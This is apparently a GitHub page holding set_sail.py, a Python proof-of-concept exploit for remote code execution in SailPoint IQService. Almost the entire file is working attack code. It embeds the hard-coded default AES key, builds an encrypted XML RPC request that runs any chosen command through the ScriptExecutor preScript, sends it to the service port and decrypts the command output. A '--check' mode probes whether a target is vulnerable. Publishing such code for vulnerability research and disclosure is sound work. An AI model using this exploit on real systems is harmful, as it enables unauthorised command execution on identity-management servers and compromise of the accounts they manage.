-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathset_sail.py
More file actions
291 lines (230 loc) · 10.6 KB
/
set_sail.py
File metadata and controls
291 lines (230 loc) · 10.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
#!/usr/bin/env python3
########################################################################################################################
# SailPoint IQService up to and including version IQService-Feb-2025 is affected by a Remote Code Execution
# vulnerability. The default configuration for the IQService RPC Server relies on a hard-coded encryption key to prevent
# unauthorized requests. User authentication is not required by default. An attacker who knows this key can send a
# crafted request to the service to execute arbitrary code. Due to the application's role in Identity and Access
# Management, additional requests can be used to compromise managed accounts beyond the application itself.
########################################################################################################################
# Title: SailPoint IQService - RCE via Default Encryption Key
# Researcher: Jason Juntunen (@missing0x00) https://github.com/missing0x00
# Software Link: https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/intro.html
# Version: SailPoint IQService-Feb-2025
########################################################################################################################
import argparse
import logging
import re
import socket
import ssl
import sys
from base64 import b64encode, b64decode
from xml.sax.saxutils import escape,unescape
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
try:
import coloredlogs
except ImportError:
coloredlogs = None
# Shared module state. A module-level ``global`` statement binds nothing, so
# give both names a real initial value: ``args`` is replaced by the parsed
# command-line namespace in main(), and ``log`` is rebound to the configured
# logger by configure_logging().
args = None
log = logging.getLogger(__name__)
def do_decrypt(**kwargs):
    """Decode a Base64 blob, peel off the leading IV and AES-CBC decrypt the rest.

    Keyword arguments read:
        enc_bytes: Base64 encoded ``IV + ciphertext``.
        key: AES key handed to the cipher.
        label: Name of the blob, used only in the log output.

    Returns:
        The unpadded plaintext bytes, or ``None`` when cipher setup,
        decryption or unpadding fails (the failure is logged). Base64
        decoding runs outside the guarded section, so its errors propagate
        to the caller.
    """
    blob = kwargs['enc_bytes']
    aes_key = kwargs['key']
    blob_repr = str(blob)  # captured up front for the failure log line
    log.info(f'Decrypting {kwargs["label"]}')
    log.debug(kwargs)
    raw = b64decode(blob)
    try:
        # Layout: first 16 bytes are the IV, everything after is ciphertext
        iv, ciphertext = raw[:16], raw[16:]
        cipher = AES.new(aes_key, AES.MODE_CBC, iv)
        return unpad(cipher.decrypt(ciphertext), 16)
    except Exception as err:
        log.error(blob_repr + ' | Decrypt failure | ' + str(err))
    return None
def do_encrypt(clear_bytes, key, iv, **kwargs):
    """AES-CBC encrypt ``clear_bytes`` and return Base64 of ``IV + ciphertext``.

    Args:
        clear_bytes: Plaintext bytes; padded to a 16-byte boundary before
            encryption.
        key: AES key bytes.
        iv: Initialisation vector bytes, also prepended to the ciphertext.
        **kwargs: Must contain ``label``, the name used in the log output.

    Returns:
        The Base64 encoded result as a ``str``.
    """
    log.info(f'Encrypting {kwargs["label"]}')
    log.debug(f'{clear_bytes}, {key}, {iv}')
    cipher = AES.new(key, AES.MODE_CBC, iv)
    log.debug(f'Key: {key} Bytes: {clear_bytes}')
    padded = pad(clear_bytes, 16)
    log.debug(f'Padded bytes: {padded}')
    blob = iv + cipher.encrypt(padded)
    encoded = b64encode(blob).decode()
    log.debug(f'Encrypted_Base64: {encoded}')
    return encoded
def build_payload(**kwargs):
    """Create RpcRequest and RPC header, encrypt and encode, return final payload.

    The request XML is selected from the module-level ``args`` namespace:
    ``args.check`` sends a fixed DoNothing request, ``args.xml`` reads the
    request from that file, otherwise a request is built around
    ``kwargs['command']``.

    Keyword arguments read:
        command: Command text (only for the default request).
        key: AES key bytes used for every encrypted section.
        iv: AES IV bytes used for every encrypted section.

    Returns:
        The assembled payload as UTF-8 encoded bytes.
    """
    log.info('Building payload...')
    log.debug(kwargs)
    if args.check is True:
        # Send DoNothing XML to only verify encryption
        xml_str = '<RpcRequest service="ADConnector" method="DoNothing" version="1.0"/>'
        log.warning('Sending DoNothing request')
    elif args.xml:
        # Use provided XML file for XML-RPC request. The context manager
        # closes the handle, and the file is read as UTF-8 because the text
        # is encoded as UTF-8 again further down.
        with open(args.xml, 'r', encoding='utf-8') as xml_file:
            xml_str = xml_file.read()
        log.warning(f'Sending XML-RPC payload from {args.xml}')
    else:
        command = kwargs['command']
        request_id = '0000000000000000'
        output_file = f'Script_{request_id}.tmp'  # Output filename, server should delete after running
        script_source = f'{command}>{output_file}&0'  # Intentionally cause error with "&0" to get output
        log.warning(f'Full command: {script_source}')
        script_source = escape(script_source)  # Escape special XML chars
        # XML RpcRequest for command execution
        xml_str = \
            f'''<RpcRequest service="ScriptExecutor" method="runBeforeScript" requestId="{request_id}">
<Arguments>
<Map>
<entry key="Application"><value><Attributes/></value></entry>
<entry key="preScript">
<value>
<Rule>
<Source>{script_source}</Source>
</Rule>
</value>
</entry>
<entry key="Request"><value><AccountRequest/></value></entry>
</Map>
</Arguments>
</RpcRequest>'''
    xml_bytes = bytes(xml_str, "utf8")
    log.debug(f'Payload XML: {xml_bytes}')
    key = kwargs['key']
    iv = kwargs['iv']
    enc_xml = do_encrypt(clear_bytes=xml_bytes, key=key, iv=iv, label="xml_bytes")
    # RPC PayloadHeader: packetId, version, type, payloadSize
    payload_length = str(len(enc_xml)).zfill(10)
    header = f'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 2.0, rpc, {payload_length}'
    header = bytes(header, 'utf-8')
    # Same key for both to keep it simple
    enc_header = do_encrypt(clear_bytes=header, key=key, iv=iv, label="payload_header")
    enc_session_key = do_encrypt(clear_bytes=key, key=key, iv=iv, label="session_key")
    enc_key_len = str(len(enc_session_key)).zfill(4)
    # Combine everything into the final payload
    # Start with 'C' or '$' to indicate CBC
    payload_string = f'C{enc_key_len}{enc_session_key}{enc_header}\n{enc_xml}'
    log.debug(f'Payload string: {payload_string}')
    payload_bytes = bytes(payload_string, 'utf-8')
    return payload_bytes
def process_response(response, key, **kwargs):
    """Split and decrypt response using server-provided key.

    The response is split at the first CRLF into a header and a body. The
    header is decrypted with ``key`` and its plaintext is then used as the
    key for the body. If that path raises, the whole response is decrypted
    with ``key`` as a fallback.

    Args:
        response: Raw bytes received from the server.
        key: AES key bytes for the header (and for the fallback).
        **kwargs: Forwarded unchanged to ``do_decrypt``.

    Returns:
        The text between the first ``<String>`` / ``</String>`` pair of the
        decrypted body, or the whole decrypted body when no such tag exists.

    Raises:
        ValueError: If the body could not be decrypted.
        SystemExit: Always, when ``args.check`` is set, after the check
            result has been reported.
    """
    log.info('Response received, processing...')
    try:
        enc_response_header, enc_response_body = response.split(b'\r\n', 1)
        log.debug(b'Encrypted response header: ' + enc_response_header)
        log.debug(b'Encrypted response body: ' + enc_response_body)
        # Decrypt header portion using key
        decrypted_header = do_decrypt(enc_bytes=enc_response_header, key=key, label='response_header', **kwargs)
        # Use decrypted header as new key for body
        decrypted_body = do_decrypt(enc_bytes=enc_response_body, key=decrypted_header, label='response_body', **kwargs)
    except Exception as e:
        log.error(e)
        log.debug(b'Full response: ' + response)
        decrypted_body = do_decrypt(enc_bytes=response, key=key, label='full_response_body', **kwargs)
    if args.check is True:
        if decrypted_body is not None and b'RpcResponse' in decrypted_body:
            log.debug(f'decrypted_body: {decrypted_body}')
            print(f'VULNERABLE\t{args.target}:{args.port}')
        else:
            log.error('Unexpected response, may not be vulnerable')
        sys.exit()
    if decrypted_body is None:
        # do_decrypt() returns None on failure; fail with a clear message
        # instead of an AttributeError from None.decode().
        raise ValueError('Unable to decrypt response body')
    body_str = decrypted_body.decode("utf8")
    log.warning(body_str)
    if '<String>' in body_str:
        response_str = re.split('<String>|</String>', body_str)[1]
    else:
        response_str = body_str
    return response_str
def do_exploit(**kwargs):
    """Execute command on target using ScriptExecutor.

    Builds the payload from ``kwargs``, sends it to ``args.target`` /
    ``args.port`` over TCP (optionally wrapped in TLS), reads the reply until
    the peer closes the connection and returns the extracted output.

    Keyword arguments read:
        command: Command text, echoed in the printed result.
        use_ssl: When true, wrap the connection in TLS.
        (all keyword arguments are also forwarded to ``build_payload``)

    Returns:
        The unescaped text after the ``: 1 :`` marker when present,
        otherwise the processed response unchanged.

    Raises:
        SystemExit: With status 1 when the connection cannot be established.
    """
    command = kwargs['command']
    use_ssl = kwargs['use_ssl']
    # Build and encrypt payload
    payload = build_payload(**kwargs)
    payload_size = len(payload)
    # Open TCP socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        if use_ssl:
            # ssl.wrap_socket() was removed in Python 3.12. This context
            # reproduces its defaults: no certificate or hostname checks.
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            context.check_hostname = False
            context.verify_mode = ssl.CERT_NONE
            s = context.wrap_socket(s)
        try:
            s.connect((args.target, args.port))
        except Exception as e:
            log.error(e)
            sys.exit(1)
        # Send prepared payload to RPC server
        log.info('Sending RpcRequest')
        log.warning(f'{str(payload_size)} bytes to tcp://{args.target}:{args.port}')
        s.sendall(payload)  # send() may transmit only part of the buffer
        # Receive response from RPC server
        chunks = []
        while True:
            try:
                r = s.recv(4096)
            except Exception as e:
                # A failed socket keeps failing; stop instead of looping forever
                log.error(e)
                break
            if not r:
                break
            chunks.append(r)
        response = b''.join(chunks)
    finally:
        # Always release the socket, including on the early exit above
        s.close()
    # Decrypt and parse response
    processed_response = process_response(response, key=args.key)
    # Command output follows "Before Script returned non-zero exit code : 1 : "
    # Results may also be XML character encoded
    if ': 1 :' in processed_response:
        cmd_out = re.split(': 1 :', processed_response)[1]
        cmd_out = unescape(cmd_out.strip())
        print(f'>>> {command}\n{cmd_out}')
    else:
        log.error(processed_response)
        cmd_out = processed_response
    return cmd_out
def configure_logging(verbosity):
    """Create the module logger and set its level from the ``-v`` count.

    Args:
        verbosity: Number of ``-v`` flags. 0 maps to ERROR, 1 to WARNING,
            2 to INFO and 3 to DEBUG; values outside 0-3 are clamped to the
            nearest of those.

    Side effects:
        Rebinds the module-level ``log``. When ``coloredlogs`` is available
        it is installed on that logger, otherwise a hint is logged.
    """
    global log
    log = logging.getLogger(__name__)
    log_level = {
        0: logging.ERROR,
        1: logging.WARNING,
        2: logging.INFO,
        3: logging.DEBUG
    }
    # "-v" can be repeated any number of times; clamp so that e.g. -vvvv
    # selects DEBUG instead of raising KeyError.
    level = log_level[max(0, min(verbosity, 3))]
    log.setLevel(level)
    if coloredlogs:
        coloredlogs.install(logger=log, level=level,
                            fmt="%(asctime)s | %(lineno)s:%(funcName)s() | %(message)s")
    else:
        log.warning('For more logging: pip3 install coloredlogs')
def main():
    """Parse the command line, configure logging and run the selected action.

    Stores the parsed namespace in the module-level ``args``, converts the
    hex ``key`` and ``iv`` options to bytes and calls ``args.func`` with every
    parsed option as a keyword argument.

    Raises:
        SystemExit: With status 1 when any step raises an exception (the
            error is logged first), or as raised by argparse itself.
    """
    global args
    default_key_str = '445a343241355532424f503057543256'
    default_iv_str = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
    parser = argparse.ArgumentParser(add_help=True)
    parser.add_argument('target', help='Target server address', type=str)
    # Integer default to match type=int (the help text renders the same)
    parser.add_argument('-p', dest='port', help='Target IQService RPC port (default: %(default)s)', type=int,
                        default=5050)
    parser.add_argument('-c', dest='command', help='Command to run (default: %(default)s)', type=str,
                        default='whoami', nargs='?')
    parser.add_argument('-k', dest='key', help='AES key as hex string (default: %(default)s)',
                        default=default_key_str, type=str, nargs='?')
    parser.add_argument('-i', dest='iv', help='AES IV as hex string (default: %(default)s)',
                        default=default_iv_str, type=str, nargs='?')
    parser.add_argument('--ssl', dest='use_ssl', help='Use SSL/TLS for TCP connection', action='store_true')
    parser.add_argument('--check', dest='check', help='Send test payload to verify default key', action='store_true')
    parser.add_argument('-x', dest='xml', help='XML file for custom RPC payload', type=str)
    parser.add_argument('-v', dest='verbosity', action='count', default=0,
                        help="Increase output verbosity, use -vv or -vvv for more (requires coloredlogs)")
    parser.set_defaults(func=do_exploit)
    try:
        args = parser.parse_args()
        configure_logging(args.verbosity)
        log.debug(args)
        # Key and IV arrive as hex text; the crypto helpers need raw bytes
        args.key = bytes.fromhex(args.key)
        args.iv = bytes.fromhex(args.iv)
        args.func(**vars(args))
    except Exception as e:
        log.critical(e)
        # Report failure to the calling shell with a non-zero status
        sys.exit(1)
# Entry point: run the CLI only when executed as a script, not on import.
if __name__ == '__main__':
    main()